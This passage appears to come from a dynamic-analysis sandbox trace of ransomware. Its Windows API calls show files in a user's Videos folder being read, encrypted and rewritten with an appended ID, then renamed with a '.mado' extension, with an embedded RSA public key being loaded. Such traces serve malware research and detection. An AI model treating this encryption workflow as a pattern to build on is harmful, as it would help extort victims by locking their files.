pdwDataLen=0x39cfa54) returned 1 [0205.693] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.693] GetLastError () returned 0x0 [0205.693] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.693] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.693] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.693] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.693] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ae0) returned 0x3b81690 [0205.694] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66738 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9b8 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66780 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9d0 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea00 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0205.694] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea00 | out: hHeap=0x2c0000) returned 1 [0205.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fea18 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fea00 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6edb0 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eec8 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea00 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.695] GetCurrentThreadId () returned 0x600 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69b78 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.696] GetCurrentThreadId () returned 0x600 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea00 [0205.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9e8 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea00 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea00 [0205.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6edb0 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6eb80 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6ec98 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea00 | out: hHeap=0x2c0000) returned 1 [0205.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea30 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9e8 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9d0 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66780 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.699] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x8ad1, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x8ad1, lpOverlapped=0x0) returned 1 [0205.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.699] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8ad6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.699] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.700] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.700] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.700] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.700] CloseHandle (hObject=0x63c) returned 1 [0205.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0205.701] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\hBFHaXpuqXh9A6Tjfu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\hbfhaxpuqxh9a6tjfu.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\hBFHaXpuqXh9A6Tjfu.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\hbfhaxpuqxh9a6tjfu.mkv.mado")) returned 1 [0205.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.702] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.703] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5636e6a0, ftCreationTime.dwHighDateTime=0x1d5d94f, ftLastAccessTime.dwLowDateTime=0x6c7e4df0, ftLastAccessTime.dwHighDateTime=0x1d5dea3, ftLastWriteTime.dwLowDateTime=0x6c7e4df0, ftLastWriteTime.dwHighDateTime=0x1d5dea3, nFileSizeHigh=0x0, nFileSizeLow=0xdce3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jBglL OmaREsTS.mp4", cAlternateFileName="JBGLLO~1.MP4")) returned 1 [0205.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.703] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\jBglL OmaREsTS.mp4") returned=".mp4" [0205.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\jBglL OmaREsTS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\jbgll omarests.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.704] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=56547) returned 1 [0205.704] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.706] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xdcbd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.706] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.708] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.708] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xdce3, lpOverlapped=0x0) returned 1 [0205.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.708] lstrlenA (lpString="-----BEGIN PUBLIC 